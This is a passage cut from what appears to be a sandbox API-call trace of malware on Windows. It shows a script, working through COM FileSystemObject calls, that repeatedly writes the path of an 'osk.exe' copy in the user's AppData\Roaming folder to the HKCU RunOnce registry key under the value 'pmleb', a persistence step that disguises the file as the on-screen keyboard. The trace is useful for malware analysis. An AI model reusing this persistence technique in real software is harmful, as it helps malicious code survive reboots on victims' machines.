wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.613] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.613] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x46 [0079.613] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.613] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x47 [0079.613] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.614] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x46 [0079.614] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.614] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.614] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.614] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.614] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.615] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.615] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.615] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.615] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.615] RegCloseKey (hKey=0x280) returned 0x0 [0079.615] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.615] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.615] SetTimer (hWnd=0x20280, nIDEvent=0x2046, uElapse=0xa, lpTimerFunc=0x0) returned 0x2046 [0079.615] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.633] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.633] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.633] KillTimer (hWnd=0x20280, uIDEvent=0x2046) returned 1 [0079.633] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.633] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.633] IUnknown:Release (This=0x787518) returned 0x1 [0079.634] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.634] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.634] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.634] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.634] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x47 [0079.634] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.634] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x48 [0079.634] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.635] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x47 [0079.635] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.635] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.635] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.635] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.635] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.635] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.635] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.635] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.636] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.636] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.636] RegCloseKey (hKey=0x280) returned 0x0 [0079.636] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.636] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.636] SetTimer (hWnd=0x20280, nIDEvent=0x2047, uElapse=0xa, lpTimerFunc=0x0) returned 0x2047 [0079.636] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.643] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.643] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.644] KillTimer (hWnd=0x20280, uIDEvent=0x2047) returned 1 [0079.644] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.644] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.644] IUnknown:Release (This=0x787518) returned 0x1 [0079.644] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.644] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.644] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.644] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.644] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.644] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.644] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.644] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.645] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.645] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x48 [0079.645] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.645] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x49 [0079.645] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.646] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x48 [0079.646] ??2@YAPAXI@Z () returned 0x2b51e50 [0079.646] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.646] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.646] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.646] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.646] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.646] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.646] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.646] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.646] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.647] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.647] RegCloseKey (hKey=0x280) returned 0x0 [0079.647] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.647] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.647] SetTimer (hWnd=0x20280, nIDEvent=0x2048, uElapse=0xa, lpTimerFunc=0x0) returned 0x2048 [0079.647] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.659] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.659] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.659] KillTimer (hWnd=0x20280, uIDEvent=0x2048) returned 1 [0079.659] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.659] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.660] IUnknown:Release (This=0x787518) returned 0x1 [0079.660] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: 